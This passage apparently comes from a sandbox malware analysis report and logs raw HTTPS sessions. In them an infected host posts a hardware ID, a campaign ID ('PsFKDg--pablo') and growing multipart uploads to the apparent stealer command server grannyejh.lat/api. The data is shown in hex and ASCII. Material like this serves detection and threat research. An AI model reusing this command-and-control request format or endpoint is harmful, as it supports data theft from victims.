                                                                                                                                                                                                                                                          2024-12-19 13:27:07 UTC2772OUTData Raw: f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19
                                                                                                                                                                                                                                                          Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                                                                                                                          2024-12-19 13:27:08 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:08 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=l0526ckm98qsjj9eththb78pqp; expires=Mon, 14 Apr 2025 07:13:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeeL8ZZ3T0qNZMgyrvmpw4F2w%2BpdJtx6SmecbEfw9KbelToHxYg5ThuNUFc%2FfhZFI%2FMTMkTrqz1nyA5uvw5BY9Z2ZJqbEvV5nY8%2F3kOsUxt3K21fBDxjmib9qogPMkxX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba6f9d13424b-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1602&rtt_var=613&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2830&recv_bytes=19052&delivery_rate=1766485&cwnd=248&unsent_bytes=0&cid=80449d41daad46c2&ts=957&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          44192.168.2.450223172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:07 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:07 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=4D9AEFC7455232ACAC8923850305D13E
                                                                                                                                                                                                                                                          2024-12-19 13:27:08 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:08 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=j20ha92s2edb9aguv8co4hjfv2; expires=Mon, 14 Apr 2025 07:13:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEt5ELGGsv%2BmDL1EoXft0n3A4eDcklLTb48Ba8q9U%2FGRGEt4lVC%2BW2PecMxgzM52bEBBgXd0rEChhC2mg37Q7SLF9e8NpbiJrvOwX5GYLGCierydFlYujBQs6VVJsHXY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba71be00c45c-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1610&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=979&delivery_rate=1643218&cwnd=243&unsent_bytes=0&cid=4a8fd3355285d5ad&ts=789&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:08 UTC214INData Raw: 64 30 0d 0a 4e 78 38 73 55 4a 4a 47 35 77 38 6c 73 64 2f 6a 33 49 48 4b 5a 79 49 37 30 63 2f 59 6e 54 69 33 4c 43 4f 6f 71 61 42 43 78 57 35 73 5a 41 34 6c 73 48 7a 46 5a 31 48 46 72 39 6d 41 72 70 5a 49 45 77 50 6b 34 65 71 73 44 5a 6b 64 45 70 75 48 6b 58 53 5a 51 56 68 35 53 67 79 39 49 6f 4a 70 43 39 53 6e 68 76 36 74 36 41 46 57 47 65 76 2f 39 4c 39 64 6c 52 59 54 31 59 58 62 59 4c 42 4d 44 54 31 45 4a 4f 59 32 33 56 4d 4b 37 66 44 53 35 4c 54 6b 56 52 4d 4f 2f 2f 37 70 72 68 61 47 47 6e 2b 48 32 74 51 6e 70 41 4e 72 4d 46 34 78 2f 43 4b 49 59 67 76 55 70 34 62 2b 72 65 67 42 56 68 6e 72 2f 2f 53 2f 58 5a 55 57 45 39 58 30 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: d0Nx8sUJJG5w8lsd/j3IHKZyI70c/YnTi3LCOoqaBCxW5sZA4lsHzFZ1HFr9mArpZIEwPk4eqsDZkdEpuHkXSZQVh5Sgy9IoJpC9Snhv6t6AFWGev/9L9dlRYT1YXbYLBMDT1EJOY23VMK7fDS5LTkVRMO//7prhaGGn+H2tQnpANrMF4x/CKIYgvUp4b+regBVhnr//S/XZUWE9X0
                                                                                                                                                                                                                                                          2024-12-19 13:27:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          45192.168.2.450224172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:09 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=SB5IZUPEW
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8730
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:09 UTC8730OUTData Raw: 2d 2d 53 42 35 49 5a 55 50 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 42 35 49 5a 55 50 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 42 35 49 5a 55 50 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 53 42 35 49 5a 55 50 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                                          Data Ascii: --SB5IZUPEWContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--SB5IZUPEWContent-Disposition: form-data; name="pid"2--SB5IZUPEWContent-Disposition: form-data; name="lid"PsFKDg--pablo--SB5IZUPEWContent-Disp
                                                                                                                                                                                                                                                          2024-12-19 13:27:10 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:10 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=bp51imok2ss080s6gdll5arh1u; expires=Mon, 14 Apr 2025 07:13:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9x2Y3obegf99jDgbOyAGptnnXjR9EgtaqI%2BtM1rb8ExoXCZK8YBWoVL2L3v2qJ6dM5cfCbPX339Hw8YKU9GsIX7t4OKbSDrwGlGeRYuaiFguGry1EaYDfdcKV%2FqFmiq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba7d3e7dc434-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1640&rtt_var=641&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9657&delivery_rate=1673352&cwnd=196&unsent_bytes=0&cid=3f839114d4baa271&ts=789&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          46192.168.2.450227172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:11 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=3LQYX7D8A4H0S
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20407
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:11 UTC15331OUTData Raw: 2d 2d 33 4c 51 59 58 37 44 38 41 34 48 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 4c 51 59 58 37 44 38 41 34 48 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 4c 51 59 58 37 44 38 41 34 48 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 4c 51 59 58 37 44 38 41 34 48
                                                                                                                                                                                                                                                          Data Ascii: --3LQYX7D8A4H0SContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--3LQYX7D8A4H0SContent-Disposition: form-data; name="pid"3--3LQYX7D8A4H0SContent-Disposition: form-data; name="lid"PsFKDg--pablo--3LQYX7D8A4H
                                                                                                                                                                                                                                                          2024-12-19 13:27:11 UTC5076OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                          2024-12-19 13:27:12 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:12 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3d8vae4tkpegta32f9ubbm5407; expires=Mon, 14 Apr 2025 07:13:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMlpR6dA9j3xtuvW%2B%2BZ1%2BZ65hio0hQcIU%2BQk4SKHnsrjhCjpxjRGbQ2BwXVBLnK2SD7bStRb6Kh5DrLJIbBd9T21DfBPN4xNPd5TAYn79CIWP5Wkb%2FeEO7VzY7znL%2FlZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba8a2f118ce3-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1816&rtt_var=706&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21361&delivery_rate=1523213&cwnd=252&unsent_bytes=0&cid=877fe67b1f4936da&ts=951&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          47192.168.2.450229172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:13 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=Q3LKT5DIJ1UAOCW70
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1279
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:13 UTC1279OUTData Raw: 2d 2d 51 33 4c 4b 54 35 44 49 4a 31 55 41 4f 43 57 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 33 4c 4b 54 35 44 49 4a 31 55 41 4f 43 57 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 33 4c 4b 54 35 44 49 4a 31 55 41 4f 43 57 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                          Data Ascii: --Q3LKT5DIJ1UAOCW70Content-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--Q3LKT5DIJ1UAOCW70Content-Disposition: form-data; name="pid"1--Q3LKT5DIJ1UAOCW70Content-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                          2024-12-19 13:27:14 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=csv7m78pf5t8vhq97vntiqebqj; expires=Mon, 14 Apr 2025 07:13:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SYqPpY0PHpO9gOi%2F5KoTlb3BGMGh%2FFfVFc3G7LiF5QmypfetR7WomMvDjOj5%2BF4%2BFppub350hxLwXA2TczAty7zpk7fNK7EUgT%2Bscm7O6Yx1UicwbuYOzNaU0ao%2BMzrs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba984a395e65-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1735&rtt_var=712&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2192&delivery_rate=1682997&cwnd=242&unsent_bytes=0&cid=45657f0cd337af43&ts=754&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          48192.168.2.450235172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=5N6KL44SOM3OLU5W9
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 572416
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 2d 2d 35 4e 36 4b 4c 34 34 53 4f 4d 33 4f 4c 55 35 57 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 4e 36 4b 4c 34 34 53 4f 4d 33 4f 4c 55 35 57 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4e 36 4b 4c 34 34 53 4f 4d 33 4f 4c 55 35 57 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                          Data Ascii: --5N6KL44SOM3OLU5W9Content-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--5N6KL44SOM3OLU5W9Content-Disposition: form-data; name="pid"1--5N6KL44SOM3OLU5W9Content-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 68 82 ed 4a ff 7a be 3a 4b 31 0d 50 ff ed a6 50 3b e0 78 6c b1 cd c0 f9 59 94 4f 52 00 c3 77 43 bf a0 b5 6d f1 2e d0 4d 1f ce 5e d9 c1 73 41 ab 78 94 b3 10 25 d2 a4 ea fa c0 63 37 44 f1 75 56 99 e1 32 50 64 db f6 e7 cb 76 28 f2 2c aa 33 4e 99 6e 2f d6 93 a8 c5 eb 9c 67 62 70 92 16 d7 f6 9d 39 2a e3 f6 5c 49 2b c6 1f f6 f1 46 d5 6d 9a 65 e1 54 7f be 4f 49 51 db 59 cd 59 30 88 3c 1e 73 77 66 5f 8b 36 84 9d 5b 7b a5 06 95 35 fa 26 42 6e 18 89 05 7a 12 8a de 91 11 5e a1 00 08 e5 37 26 6c 17 7e 34 89 7d e2 db ce 79 b0 90 59 31 8f 22 fb 20 95 35 36 b8 a8 71 4a 09 03 cf 5e 52 6e 51 c7 22 aa 90 f5 f5 51 e9 e7 9d 8d 12 4f ce 57 2f cf 0e e0 1d 2a 0f 8e 31 94 e9 35 87 96 58 29 34 8b 11 c7 78 b0 f4 f1 ab a1 1c 58 8a 1a 13 3c 69 07 7b fc 0b fb fd 7f 4b 35 35 d0 20 76
                                                                                                                                                                                                                                                          Data Ascii: hJz:K1PP;xlYORwCm.M^sAx%c7DuV2Pdv(,3Nn/gbp9*\I+FmeTOIQYY0<swf_6[{5&Bnz^7&l~4}yY1" 56qJ^RnQ"QOW/*15X)4xX<i{K55 v
